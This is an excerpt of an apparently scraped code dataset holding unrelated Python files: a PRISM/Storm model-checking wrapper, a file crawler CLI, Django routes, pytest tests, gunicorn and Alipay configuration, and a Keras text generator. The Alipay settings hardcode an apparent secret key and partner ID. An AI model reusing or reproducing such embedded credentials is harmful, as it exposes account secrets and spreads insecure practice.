print(prism_args)\n\n # print(sys.platform)\n if sys.platform.startswith(\"win\"):\n args = [\"prism.bat\"]\n else:\n args = [\"prism\"]\n args.extend(prism_args)\n\n ## forwarding error output to the file\n # args.append(\"2>&1\")\n\n if seq:\n if os.path.isfile(os.path.join(std_output_path, output_file_path)):\n os.remove(os.path.join(std_output_path, output_file_path))\n with open(property_file_path, 'r') as property_file:\n args.append(\"-property\")\n args.append(\"\")\n property_file = property_file.readlines()\n for i in range(1, len(property_file) + 1):\n args[-1] = str(i)\n if not silent:\n print(\"calling \\\"\", \" \".join(args), \"\\\"\")\n output = subprocess.run(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT).stdout.decode(\"utf-8\")\n\n ## Check for errors\n if 'OutOfMemoryError' in output:\n if \"-javamaxmem\" not in args:\n memory = round(psutil.virtual_memory()[0] / 1024 / 1024 / 1024) ## total memory converted to GB\n print(colored(f\"A memory error occurred while seq, max memory increased to {memory}GB\", \"red\"))\n args[-2] = \"-javamaxmem\"\n args[-1] = f\"{memory}g\"\n args.append(\"-property\")\n args.append(str(i))\n if sys.platform.startswith(\"win\"):\n previous_memory = set_javaheap_win(f\"{memory}g\")\n if not silent:\n print(\"calling \\\"\", \" \".join(args), \"\\\"\")\n output = subprocess.run(args, stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT).stdout.decode(\"utf-8\")\n if 'OutOfMemoryError' in output:\n write_to_file(output_file_path, output, silent, append=True)\n print(colored(f\"A memory error occurred while seq even after increasing the memory, close some programs and try again\", \"red\"))\n if sys.platform.startswith(\"win\"):\n set_javaheap_win(previous_memory)\n return \"memory_fail\", \"A memory error occurred while seq even after increasing the memory, close some programs and try again\"\n else:\n write_to_file(output_file_path, output, silent, append=True)\n print(colored(f\"A memory error occurred while seq with given amount of memory\", \"red\"))\n ## Changing the memory setting back\n if sys.platform.startswith(\"win\"):\n set_javaheap_win(previous_memory)\n return \"memory\", \"A memory error occurred while seq with given amount of memory\"\n\n write_to_file(output_file_path, output, silent, append=True)\n\n ## Check for errors\n ## 'OutOfMemoryError', \"Cannot allocate memory\", 'Type error', 'Syntax error', 'NullPointerException', 'use -noprobchecks'\n output = output.split(\"\\n\")\n for item in output:\n # print(item)\n if 'use -noprobchecks' in item:\n print(colored(f\"Outgoing transitions checksum error occurred\", \"red\"))\n return \"noprobchecks\", item.strip()\n if (\"error\" in item.lower()) or (\"Cannot allocate memory\" in item) or ('exception' in item.lower()):\n spam = item.strip()\n print(colored(spam, \"red\"))\n return \"error\", spam\n\n else:\n if not silent:\n print(\"calling \\\"\", \" \".join(args))\n output = subprocess.run(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT).stdout.decode(\"utf-8\")\n write_to_file(output_file_path, output, silent, append=False)\n\n ## Check for errors\n ## 'OutOfMemoryError', \"Cannot allocate memory\", 'Type error', 'Syntax error', 'NullPointerException', 'use -noprobchecks'\n output = output.split(\"\\n\")\n for item in output:\n # print(item)\n if 'use -noprobchecks' in item:\n print(colored(f\"Outgoing transitions checksum error occurred\", \"red\"))\n return \"noprobchecks\", item.strip()\n if (\"error\" in item.lower()) or (\"Cannot allocate memory\" in item) or ('exception' in item.lower()):\n spam = item.strip()\n print(colored(spam, \"red\"))\n return \"error\", spam\n return 0, \"\"\n finally:\n os.chdir(curr_dir)\n\n\n## TODO rewrite this without the paths, just files\ndef call_prism_files(model_prefix, agents_quantities, param_intervals=False, seq=False, noprobchecks=False, memory=\"\",\n model_path=model_path, properties_path=properties_path, property_file=False, output_path=prism_results, gui=False, silent=False):\n \"\"\" Calls prism for each file matching the prefix\n\n Args:\n model_prefix (string): file prefix to be matched\n agents_quantities (int): pop_sizes to be used\n param_intervals (list of pairs): list of intervals to be used for respective parameter (default all intervals are from 0 to 1)\n seq (bool): if true it will take properties one by one and append the results (helps to deal with memory)\n noprobchecks (bool): True if no noprobchecks option is to be used for prism\n model_path (string): path to load models from\n properties_path (string): path to load properties from\n param_intervals (list of pairs): parameter intervals\n property_file (string): file name of single property files to be used for all models\n output_path (string): path for the output\n memory (int): sets maximum memory in GB, see https://www.prismmodelchecker.org/manual/ConfiguringPRISM/OtherOptions\n gui (bool): callback function to be used\n silent (bool): if True the output is put to minimum\n \"\"\"\n # print(\"model_path \", model_path)\n # print(\"model_prefix \", model_prefix)\n # os.chdir(config.get(\"mandatory_paths\",\"cwd\"))\n if noprobchecks:\n noprobchecks = '-noprobchecks '\n else:\n noprobchecks = \"\"\n\n if memory == \"\":\n memory = \"\"\n elif \"javamaxmem\" not in str(memory):\n memory = f'-javamaxmem {memory}g '\n\n if not agents_quantities:\n # print(\"I was here\")\n agents_quantities = [\"\"]\n\n for N in sorted(agents_quantities):\n # print(\"glob.glob(os.path.join(model_path, model_prefix + str(N) + .pm))\", glob.glob(os.path.join(model_path, model_prefix + str(N) + \".pm\")))\n # print(\"glob.glob(os.path.join(model_path, model_prefix))\", glob.glob(os.path.join(model_path, model_prefix)))\n # print(\"model_prefix\", model_prefix)\n if \".\" in model_prefix:\n files = glob.glob(os.path.join(model_path, model_prefix))\n else:\n files = glob.glob(os.path.join(model_path, model_prefix + str(N) + \".pm\"))\n if not silent:\n print(\"input files: \", files)\n if not files:\n print(colored(\"No model files for N=\"+str(N)+\" found\", \"red\"))\n if gui:\n gui(1, \"Parameter synthesis\", \"No model files found.\")\n for file in files:\n file = Path(file)\n start_time = time()\n # print(\"{} seq={}{} >> {}\".format(file, seq, noprobchecks, str(prism_results)))\n\n ## Parsing the parameters from the files\n spam = parse_params_from_model(file, silent)\n params = \"\"\n i = 0\n for param in spam:\n if param_intervals:\n params = f\"{params}{param}={param_intervals[i][0]}:{param_intervals[i][1]},\"\n else:\n params = f\"{params}{param}=0:1,\"\n i = i + 1\n ## Getting rid of the last ,\n if params:\n params = params[:-1]\n\n ## OLD parameters\n # if multiparam:\n # params = \"\"\n # for i in range(1, N):\n # params = \"{},q{}=0:1\".format(q, i)\n # # q=q+\",q\"+str(i)\"=0:1\"\n # else:\n # params = \",q=0:1\"\n # error = call_prism(\"{} prop_{}.pctl {}{}-param p=0:1{}\".format(file, N, memory, noprobchecks, params),\n # seq=seq,\n # model_path=model_path, properties_path=properties_path, std_output_path=output_path)\n\n # print(\"{} prop_{}.pctl {}-param p=0:1{}\".format(file,N,noprobchecks,q))\n\n ## Calling the PRISM using our function\n\n if not property_file:\n error = call_prism(\"{} prop_{}.pctl {}{}-param {}\".format(file, N, memory, noprobchecks, params),\n seq=seq, model_path=model_path, properties_path=properties_path,\n std_output_path=output_path)\n else:\n # print(\"output_path\", output_path)\n # print(\"file\", file.stem)\n error = call_prism(\"{} {} {}{}-param {}\".format(file, property_file, memory, noprobchecks, params),\n seq=seq, model_path=model_path, properties_path=properties_path, std_output_path=output_path,\n std_output_file=\"{}_{}.txt\".format(str(file.stem).split(\".\")[0], str(Path(property_file).stem).split(\".\")[0]),\n silent=silent)\n\n # print(f\" Return code is: {error}\")\n if not silent:\n print(f\" It took {socket.gethostname()}, {time() - start_time} seconds to run\")\n\n ## Check for missing files\n if error[0] == 404:\n print(colored(error[1], \"red\"))\n if gui:\n gui(2, \"Parameter synthesis\", error[1])\n continue\n\n ## Check if memory problem has occurred\n if error[0] == \"memory\":\n if not seq:\n ## A memory occurred while not seq, trying seq now\n seq = True\n ## Remove the file because appending would no overwrite the file\n os.remove(os.path.join(output_path, \"{}.txt\".format(file.stem)))\n print(colored(\"A memory error occurred. Running prop by prob now\", \"red\"))\n if gui:\n gui(3, \"Parameter synthesis\", \"A memory error occurred. Running prop by prob now\")\n else:\n ## A memory occurred while seq\n ## Remove the file because appending would not overwrite the file\n os.remove(os.path.join(output_path, \"{}.txt\".format(file.stem)))\n memory = round(psutil.virtual_memory()[0] / 1024 / 1024 / 1024) ## total memory converted to GB\n if sys.platform.startswith(\"win\"):\n previous_memory = set_javaheap_win(f\"{memory}g\")\n print(colored(f\"A memory error occurred while seq, max memory increased to {memory}GB\", \"red\"))\n if gui:\n gui(3, \"Parameter synthesis\", f\"A memory error occurred while seq, max memory increased to {memory}GB\")\n\n if error[0] == \"memory_fail\":\n ## An error occurred even when seq and max memory, no reason to continue\n if gui:\n gui(1, \"Parameter synthesis\", f\"An error occurred even when seq and max memory\")\n break\n\n ## Check if there was problem with sum of probabilities\n if error[0] == \"noprobchecks\":\n if noprobchecks == \"\":\n print(colored(\"Outgoing transitions checksum error occurred. Running with noprobchecks option\", \"red\"))\n noprobchecks = '-noprobchecks '\n if gui:\n gui(3, \"Parameter synthesis\", \"Outgoing transitions checksum error occurred. Running with noprobchecks option\")\n else:\n print(colored(\"This is embarrassing, but Outgoing transitions checksum error occurred while noprobchecks option\", \"red\"))\n if gui:\n gui(2, \"Parameter synthesis\", \"This is embarrassing, but Outgoing transitions checksum error occurred while noprobchecks option\")\n\n ## Check for other errors\n if error[0] == \"error\":\n ## Check for NullPointerException\n if \"NullPointerException\" in error[1]:\n if seq:\n # print(colored(error[1], \"red\"))\n print(colored(\"Sorry, I do not know to to fix this, please try it manually\", \"red\"))\n print()\n if gui:\n gui(1, \"Parameter synthesis\", \"Sorry, I do not know to to fix this, please try it manually\")\n break\n else:\n print(colored(\"Trying to fix the null pointer exception by running prop by prop\", \"red\"))\n if gui:\n gui(3, \"Parameter synthesis\", \"Trying to fix the null pointer exception by running prop by prop\")\n seq = True\n ## Remove the file because appending would no overwrite the file\n os.remove(os.path.join(output_path, \"{}.txt\".format(file.stem)))\n elif ('OutOfMemoryError' in error[1]) or (\"Cannot allocate memory\" in error[1]):\n if not seq:\n seq = True\n else:\n print(colored(f\"A memory error occurred while seq, close some programs and try again with more memory\", \"red\"))\n if gui:\n gui(2, \"Parameter synthesis\", f\"A memory error occurred while seq, close some programs and try again with more memory\")\n elif \"Type error\" in error[1]:\n print(colored(\"A type error occurred, please check input files or manual\", \"red\"))\n if gui:\n gui(2, \"Parameter synthesis\", \"A type error occurred, please check input files or manual\")\n elif \"Syntax error\" in error[1]:\n print(colored(\"A syntax error occurred, please check input files or manual\", \"red\"))\n if gui:\n gui(2, \"Parameter synthesis\", \"A syntax error occurred, please check input files or manual\")\n else:\n print(\"Unrecognised error occurred:\")\n print(colored(error[1], \"red\"))\n if gui:\n gui(1, \"Parameter synthesis\", f\"Unrecognised error occurred: \\n {error[1]}\")\n continue\n\n if error[0] is not 0:\n ## If an error occurred call this function for this file again\n print()\n # print(\"seq\",seq)\n # print(\"noprobchecks\", noprobchecks)\n call_prism_files(model_prefix, [N], seq=seq, noprobchecks=noprobchecks, memory=memory, model_path=model_path,\n properties_path=properties_path, property_file=property_file, output_path=prism_results)\n print()\n\n ## Setting the previous memory on windows\n if sys.platform.startswith(\"win\"):\n try:\n set_javaheap_win(previous_memory)\n except UnboundLocalError:\n pass\n\n\n## TODO rewrite this without the paths, just files\ndef call_storm(args, silent: bool = False, model_path=model_path, properties_path=properties_path,\n storm_output_path=storm_results, std_output_path=storm_results, std_output_file=False, time=False):\n \"\"\" Prints calls for storm model checking.\n\n Args:\n args (string): args for executing storm\n silent (bool): if silent command line output is set to minimum\n model_path (string): path to load models from\n properties_path (string): path to load properties from\n storm_output_path (string): path to save the files inside the command\n std_output_path (string): path to save the results of the command\n std_output_file (string): file name to save the output\n time (bool): if True time measurement is added\n \"\"\"\n # print(\"std_output_path\", std_output_path)\n # print(\"storm_results\", storm_results)\n # print(\"std_output_file\", std_output_file)\n\n if std_output_path is not None:\n output_file_path = Path(args.split()[0]).stem\n if not std_output_file:\n output_file_path = os.path.join(std_output_path, Path(str(output_file_path) + \".txt\"))\n else:\n output_file_path = os.path.join(storm_results, Path(str(std_output_file)))\n # print(\"new output_file_path\", output_file_path)\n else:\n output_file_path = \"\"\n\n # print(std_output_file)\n\n # os.chdir(config.get(\"mandatory_paths\",\"cwd\"))\n # print(os.getcwd())\n storm_args = []\n\n # print(args.split(\" \"))\n args = args.split(\" \")\n\n with open(output_file_path.split(\".\")[0]+\".cmd\", \"a+\") as command_file_path:\n # print(args)\n for arg in args:\n # print(arg)\n # print(re.compile('\\.[a-z]').search(arg))\n if re.compile('\\.pm').search(arg) is not None:\n model_file_path = os.path.join(model_path, arg)\n # print(model_file)\n if not os.path.isfile(model_file_path):\n command_file_path.write(f\"file {model_file_path} not found -- skipped \\n\")\n print(f\"{colored('file', 'red')} {model_file_path} {colored('not found -- skipped', 'red')}\")\n return 404\n storm_args.append(model_file_path)\n elif re.compile('\\.pctl').search(arg) is not None:\n property_file_path = os.path.join(properties_path, arg)\n # print(property_file)\n if not os.path.isfile(property_file_path):\n command_file_path.write(f\"file {property_file_path} not found -- skipped \\n\")\n print(f\"{colored('file', 'red')} {property_file_path} {colored('not found -- skipped', 'red')}\")\n return 404\n # storm_args.append(property_file_path)\n storm_args.append(\"my_super_cool_string\")\n elif re.compile('\\.txt').search(arg) is not None:\n command_file_path.write(f\"storm_output_path {storm_output_path} \\n\")\n print(\"storm_output_path\", storm_output_path)\n if not os.path.isabs(storm_output_path):\n storm_output_path = os.path.join(Path(storm_results), Path(storm_output_path))\n\n if not os.path.isdir(storm_output_path):\n if not silent:\n command_file_path.write(f\"The path {storm_output_path} not found, this may cause trouble \\n\")\n print(\n f\"{colored('The path', 'red')} {storm_output_path} {colored('not found, this may cause trouble', 'red')}\")\n\n storm_output_file_path = os.path.join(storm_output_path, arg)\n command_file_path.write(f\"storm_output_file_path {storm_output_file_path} \\n\")\n print(\"storm_output_file_path\", storm_output_file_path)\n storm_args.append(storm_output_file_path)\n else:\n storm_args.append(arg)\n\n args = [\"./storm-pars --prism\"]\n args.extend(storm_args)\n if time:\n args.append(\")\")\n if output_file_path is not \"\":\n args.append(\">>\")\n args.append(output_file_path)\n args.append(\"2>&1 \\n\")\n\n if time:\n spam = \"(time \"\n else:\n spam = \"\"\n for arg in args:\n spam = spam + \" \" + arg\n if time:\n spam = spam + \" \"\n\n with open(property_file_path, \"r\") as file:\n content = file.readlines()\n for line in content:\n # print(colored(line, \"blue\"))\n line = line.replace('\"', '\\\\\"')\n\n output = spam.replace(\"my_super_cool_string\", f\"--prop \\\"{line[:-1]}\\\"\")\n command_file_path.write(output)\n print(output)\n\n return True\n # output = subprocess.run(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT).stdout.decode(\"utf-8\")\n # write_to_file(std_output_path, output_file_path, output, silent, append=False)\n\n\n## TODO rewrite this without the paths, just files\ndef call_storm_files(model_prefix, agents_quantities, param_intervals=False, model_path=model_path, properties_path=properties_path, property_file=False, output_path=storm_results, time=False):\n \"\"\" Calls storm for each file matching the prefix\n\n Args:\n model_prefix: file prefix to be matched\n agents_quantities (int): pop_sizes to be used\n model_path (string): path to load models from\n param_intervals (list of pairs): list of intervals to be used for respective parameter (default all intervals are from 0 to 1)\n properties_path (string): path to load properties from\n property_file (string): file name of single property files to be used for all models\n output_path (string): path for the output\n time (bool): if True time measurement is added\n \"\"\"\n root = output_path\n\n # print(\"output_path \", output_path)\n # print(\"type(output_path) \", type(output_path))\n\n # print(\"model_prefix \", model_prefix)\n # print(\"type(model_prefix) \", type(model_prefix))\n\n # print(\"property_file \", property_file)\n # print(\"type(property_file) \", type(property_file))\n\n if not agents_quantities:\n # print(\"I was here\")\n agents_quantities = [\"\"]\n\n output_file = f\"{os.path.join(output_path, str(strftime('%d-%b-%Y-%H-%M-%S', localtime())+'.cmd'))}\"\n\n # print(output_file)\n with open(output_file, \"w\") as output_filee:\n output_filee.write(f\"cd /{root} \\n\")\n print(f\"cd /{root}\")\n\n output_filee.write(\"sudo docker pull movesrwth/storm:travis \\n\")\n print(\"sudo docker pull movesrwth/storm:travis\")\n output_filee.write(f'sudo docker run --mount type=bind,source=\"$(pwd)\",target=/{root} -w /opt/storm/build/bin --rm -it --name storm movesrwth/storm:travis \\n')\n print(f'sudo docker run --mount type=bind,source=\"$(pwd)\",target=/{root} -w /opt/storm/build/bin --rm -it --name storm movesrwth/storm:travis')\n\n # print(\"model_path\", model_path)\n # print(\"model_prefix\", model_prefix)\n for N in sorted(agents_quantities):\n if \".\" in model_prefix:\n files = glob.glob(os.path.join(model_path, model_prefix))\n else:\n files = glob.glob(os.path.join(model_path, model_prefix + str(N) + \".pm\"))\n # print(\"files\", files)\n if not files:\n with open(output_file, \"w\") as output_filee:\n output_filee.write(\"No model files for N=\"+str(N)+\" found\")\n print(colored(\"No model files for N=\"+str(N)+\" found\", \"red\"))\n continue\n for file in files:\n file = Path(file)\n # print(\"{} {}\".format(file, property_file))\n # call_storm(\"{} {}\".format(file, property_file), model_path=model_path, properties_path=properties_path, std_output_path=output_path, std_output_file=\"{}_{}.txt\".format(str(file.stem).split(\".\")[0], property_file.split(\".\")[0]), time=time)\n\n if property_file:\n # print(\"property_file\", property_file)\n # print(\"file\", file)\n # print(\"file stem\", file.resolve().stem)\n # print(\"{}_{}.txt\".format(str(file.stem).split(\".\")[0], property_file.split(\".\")[0]))\n call_storm(\"{} {}\".format(file, property_file), model_path=model_path, properties_path=properties_path, std_output_path=output_path, std_output_file=output_file)\n else:\n call_storm(\"{} prop_{}.pctl\".format(file, N), model_path=model_path, properties_path=properties_path, std_output_path=output_path, std_output_file=output_file)\n","sub_path":"src/mc.py","file_name":"mc.py","file_ext":"py","file_size_in_byte":31489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"231751323","text":"import argparse\nfrom FileOperations import FileOperations as FO\nfrom Crawler import Crawler\nimport os.path\n\nparser = argparse.ArgumentParser(description='Crawl file and execute regex rules on them')\nparser.add_argument('-p', metavar='ParameterFilePath', type=argparse.FileType('r'), required=True,\n help=\"path to a parameter json file. Parameter file should contain a 'crawling', 'rules' and 'result' key\")\nparser.add_argument('-o', metavar='OutputFilePath', type=argparse.FileType('w+'), help='output file. This argument is required if no output is specified in parameter file.\\n The file must be either a .csv or .json')\nparser.add_argument('-mt', metavar='Thread Numbers', type=int, help='have a multi-threaded cralwer (1 thread per file) and precise the number of concurrent thread')\nparser.add_argument('-s', metavar='StartDirectory', type=str, help='directory in which the crawling will start. This parameter is necessary if there is no \"crawling\" dictionary in the parameter file')\n\nargs = parser.parse_args()\nif \"p\" not in args or args.p is None:\n parser.error(parser.format_usage())\nparam = FO.get_from_JSON_file(args.p.name)\nif \"rules\" not in param or (\"o\" not in args and \"output\" not in param):\n print(\"rules error\")\n parser.error(parser.format_usage())\nif \"crawling\" not in param and (\"s\" not in args or args.s is None):\n parser.error(parser.format_usage())\nelif \"s\" in args and args.s is not None:\n param[\"crawling\"] = { \"start\": args.s}\nif \"o\" in args and args.o is not None:\n output_name, output_extension = os.path.splitext(args.o.name)\n param[\"output\"] = {\n \"path\": args.o.name,\n \"type\": \"csv\" if \".csv\" in output_extension else \"json\"\n }\nif \"mt\" in args and args.mt is not None:\n Crawler.crawl_multithread(param.get(\"crawling\"), param.get(\"rules\"), param.get(\"result\"), param[\"output\"], args.mt)\nelse:\n Crawler.crawl(param.get(\"crawling\"), param.get(\"rules\"), param.get(\"result\"), param[\"output\"])","sub_path":"filecrawler.py","file_name":"filecrawler.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"496602903","text":"from django.conf.urls import url, include\nfrom django.contrib import admin\n\nfrom . import views\n\nadmin.autodiscover()\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'index$', views.index, name='index'),\n url(r'generate$', views.generate, name='generate'),\n url('^admin/', include(admin.site.urls)),\n\n\n #requete fait en ajax pour obtenir des informations de facon dynamique\n url(r'getExempleByTypeDonnees$', views.getExempleByTypeDonnees),\n url(r'getTypeDonnees$', views.getTypeDonnees),\n]\n","sub_path":"generateData/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"61002518","text":"import numpy as np\nimport pytest\n\nfrom sdia_python.lab2.unit_box_window import UnitBoxWindow\n\n\ndef test_raise_type_error_when_something_is_called():\n with pytest.raises(TypeError):\n # call_something_that_raises_TypeError()\n raise TypeError()\n\n\n@pytest.mark.parametrize(\n \"center, expected\",\n [\n (np.array([2.5]), \"BoxWindow: [2.0, 3.0]\"),\n (\n np.array([0.5, 1, 2, 4]),\n \"BoxWindow: [0.0, 1.0] x [0.5, 1.5] x [1.5, 2.5] x [3.5, 4.5]\",\n ),\n (np.array([1, 10, 2]), \"BoxWindow: [0.5, 1.5] x [9.5, 10.5] x [1.5, 2.5]\",),\n ],\n)\ndef test_box_string_representation(center, expected):\n assert (UnitBoxWindow(center)).__str__() == expected\n\n\n@pytest.fixture\ndef box_2d_05():\n return UnitBoxWindow(np.array([[0, 5], [0, 5]]))\n\n\n@pytest.mark.parametrize(\n \"point, expected\",\n [\n (np.array([0, 0]), True),\n (np.array([2.5, 2.5]), True),\n (np.array([-1, 5]), False),\n (np.array([10, 3]), False),\n ],\n)\ndef test_indicator_function_box_2d(box_2d_05, point, expected):\n is_in = box_2d_05.indicator_function(point)\n assert is_in == expected\n\n\n#######################################test center##############################\n@pytest.mark.parametrize(\n \"bounds, expected\",\n [\n (np.array([[0, 0]]), np.array([0])),\n (np.array([[2.5, 2.5]]), np.array([2.5])),\n (np.array([[1, 3], [5, 7]]), np.array([2, 6])),\n (np.array([[1, 3], [5, 7], [10, 20]]), np.array([2, 6, 15])),\n ],\n)\ndef test_center(bounds, expected):\n box = UnitBoxWindow(bounds)\n assert np.array_equal(box.center(), expected)\n\n\n######################################test rand#################################\ndef all_in(box, n):\n flag = True\n for i in range(n):\n flag = box.indicator_function(box.rand(n)[i])\n\n return flag\n\n\n@pytest.mark.parametrize(\n \"bounds,n,expected\",\n [\n (np.array([[1, 2]]), 1, True),\n (np.array([[1, 2], [1, 2]]), 2, True),\n (np.array([[1, 2], [100, 101]]), 3, True),\n (np.array([[1, 2], [4, 4]]), 4, True),\n ],\n)\ndef test_rand_points_in_box(bounds, n, expected):\n box = UnitBoxWindow(bounds)\n assert all_in(box, n) == expected\n\n\n#######################################test volume##############################\n@pytest.mark.parametrize(\n \"bounds, expected\",\n [\n (np.array([[0, 0]]), 0),\n (np.array([[2.5, 2.5]]), 0),\n (np.array([[1, 3], [5, 7]]), 4),\n (np.array([[1, 3], [5, 7], [10, 20]]), 40),\n ],\n)\ndef test_volume(bounds, expected):\n box = UnitBoxWindow(bounds)\n assert np.array_equal(box.volume(), expected)\n","sub_path":"tests/lab2/test_unit_box_window.py","file_name":"test_unit_box_window.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"153148967","text":"import os\nimport multiprocessing\n\n# _ROOT = os.path.abspath(os.path.join(\n# os.path.dirname(__file__), '..'))\n# _VAR = os.path.join(_ROOT, 'var')\n# _ETC = os.path.join(_ROOT, 'etc')\n\nloglevel = 'info'\n# errorlog = os.path.join(_VAR, 'log/api-error.log')\n# accesslog = os.path.join(_VAR, 'log/api-access.log')\nerrorlog = \"-\"\naccesslog = \"-\"\n\nflask_host = os.getenv('FLASK_HOST', '127.0.0.1')\nflask_port = os.getenv('FLASK_PORT', 8080)\n\n# bind = 'unix:%s' % os.path.join(_VAR, 'run/gunicorn.sock')\nbind = f'{flask_host}:{flask_port}'\n\nif bool(os.getenv('DEBUG', False)):\n workers = 1\nelse:\n workers = multiprocessing.cpu_count() * 2 + 1\n\ntimeout = 3 * 60 # 3 minutes\nkeepalive = 24 * 60 * 60 # 1 day\n\ncapture_output = True\n","sub_path":"gunicorn.conf.py","file_name":"gunicorn.conf.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"12991428","text":"# -*- coding:utf-8 -*-\nfrom chaolifeProject.settings import TEST\nif TEST:\n BASE_URL = 'http://test.supreamtimes.com/api'\nelse:\n BASE_URL = 'http://www.supreamtimes.com/api'\n\nclass Alipaysettings:\n # 安全检验码,以数字和字母组成的32位字符\n ALIPAY_KEY = '200x3jvph6945seg5ylfg1xc4zhw32z1'\n\n ALIPAY_INPUT_CHARSET = 'utf-8'\n\n # 合作身份者ID,以2088开头的16位纯数字\n ALIPAY_PARTNER = '2088421443875084'\n\n # 签约支付宝账号或卖家支付宝帐户\n ALIPAY_SELLER_EMAIL = 'chaomengshidai@agesd.com'\n\n ALIPAY_SIGN_TYPE = 'RSA'\n\n # 付完款后跳转的页面(同步通知) 要用 http://格式的完整路径,不允许加?id=123这类自定义参数\n ALIPAY_RETURN_URL = ''\n\n # 交易过程中服务器异步通知的页面 要用 http://格式的完整路径,不允许加?id=123这类自定义参数\n if TEST:\n ALIPAY_NOTIFY_URL = 'http://test.supreamtimes.com/api/pay/alipay/callback/'\n else:\n ALIPAY_NOTIFY_URL = 'http://www.supreamtimes.com/api/pay/alipay/callback/'","sub_path":"chaolife/pay/views/pay/payconfig.py","file_name":"payconfig.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"320155138","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom keras.models import Sequential, load_model\nfrom keras.layers import Dense, Activation, LSTM, TimeDistributed\nfrom keras import optimizers\nimport numpy as np\nimport h5py\nimport pickle\n\"\"\"\nnum = input('Which model would you like to use? (1 for lotr, 2 for char recipe, 3 for word recipe, 4 for poetry): ')\nmodel = None\npickl = None\nfile_name = None\n\nprint(num)\n\n# file_name is included at this point just in case... you know?\nif num == 1:\n model = load_model('./models/tolkienmodel230.h5')\n file_name = './corpi/TolkiensMiddleEarth.txt'\n pickl = './pickles/lotr_pickle.p'\nelif num == 2:\n model = load_model('./models/char_recipe_model190.h5')\n file_name = './corpi/parsed_text.txt'\n pickl = './pickles/char_recipe_parsed_pickle.p'\nelif num == 3:\n model = load_model('./models/KENNETHSMODEL')\n file_name = './corpi/all_files.txt'\n pickl = './pickles/word_mappings.p'\nelif num == 4:\n model = load_model('./models/poemmodel100.h5')\n file_name = './corpi/poem_corpusv2.txt'\n pickl = './pickles/poem_pickev2.p'\n\n# data = open(file_name, 'r').read() --> Don't need this (yet?)\n# data = data.lower()\n# data = list(data.rstrip())\n# chars = list(set(data))\n\"\"\"\n# Arguments: (model, name of pickle file, length of sample)\ndef generate_with_seed(seed, model, picklename, length):\n # LOAD THE PICKLE\n with open(picklename, 'rb') as handle:\n [ix_to_char, char_to_ix] = pickle.load(handle)\n\n VOCAB_SIZE = len(ix_to_char)\n\n print(\"\\n\")\n\n ix = [char_to_ix[seed[-1]]]\n y_char = [ix_to_char[ix[-1]]]\n X = np.zeros((1, length, VOCAB_SIZE))\n for t, char in enumerate(seed):\n X[0, t, :][char_to_ix[char]] = 1\n\n for i in range(length):\n X[0, i, :][ix[-1]] = 1\n print(ix_to_char[ix[-1]], end=\"\")\n import pdb; pdb.set_trace()\n ix = np.argmax(model.predict(X[:, :i+1, :])[0], 1)\n y_char.append(ix_to_char[ix[-1]])\n return ('').join(y_char)\n\"\"\"\nprint(\"\\n\")\ngenerate_with_seed(model, pickl, 500)\nprint(\"\\n\")\n\"\"\"\n\ndef generate_with_seed_word(seed, model, picklename, length):\n # with open(picklename, 'rb') as handle:\n # [ix_to_char, char_to_ix] = pickle.load(handle)\n #\n # VOCAB_SIZE = len(ix_to_char)\n # # seed = input(\"enter seed text: \")\n # # print(\"\\n\")\n #\n # ix = [char_to_ix[seed[-1]]]\n # y_char = [ix_to_char[ix[-1]]]\n # X = np.zeros((1, length, VOCAB_SIZE))\n #\n # # for t, char in enumerate(seed):\n # # X[0, t, :][char_to_ix[char]] = 1\n # X[0][char_to_ix[seed]] = 1\n #\n # for i in range(length):\n # X[0,i,:][ix[-1]] = 1\n # print(ix_to_char[ix[-1]], end=\" \")\n # ix = np.argmax(model.predict(X[:, :i+1, :])[0], 1)\n # y_char.append(ix_to_char[ix[-1]])\n # return ('').join(y_char)\n\n\n with open(picklename, 'rb') as handle:\n [ix_to_char, char_to_ix] = pickle.load(handle)\n\n VOCAB_SIZE = len(ix_to_char)\n #seed = input(\"enter seed text: \")\n print(\"\\n\")\n\n ix = [np.random.randint(VOCAB_SIZE)]\n y_char = [ix_to_char[ix[-1]]]\n X = np.zeros((1, length, VOCAB_SIZE))\n\n for i in range(length):\n X[0,i,:][ix[-1]] = 1\n print(ix_to_char[ix[-1]], end=\" \")\n import pdb; pdb.set_trace()\n ix = np.argmax(model.predict(X[:, :i+1, :])[0], 1)\n y_char.append(ix_to_char[ix[-1]])\n return ('').join(y_char)\n\n\n# def generate_text_word(model, length):\n# ix = [np.random.randint(VOCAB_SIZE)]\n# y_char = [ix_to_char[ix[-1]]]\n# X = np.zeros((1, length, VOCAB_SIZE))\n# for i in range(length):\n# X[0, i, :][ix[-1]] = 1\n# print(ix_to_char[ix[-1]], end=\" \")\n# ix = np.argmax(model.predict(X[:, :i+1, :])[0], 1)\n# y_char.append(ix_to_char[ix[-1]])\n# return ('').join(y_char)\n","sub_path":"IE3_WebApp/app/generate_sample.py","file_name":"generate_sample.py","file_ext":"py","file_size_in_byte":3794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"81405773","text":"'''\nCreated on 08-Jun-2019\n\n@author: ramya.n\n'''\nfrom selenium import webdriver\nfrom time import sleep\nprofile = webdriver.FirefoxProfile()\nprofile.set_preference(\"dom.webnotifications.enabled\",False)\ndriver = 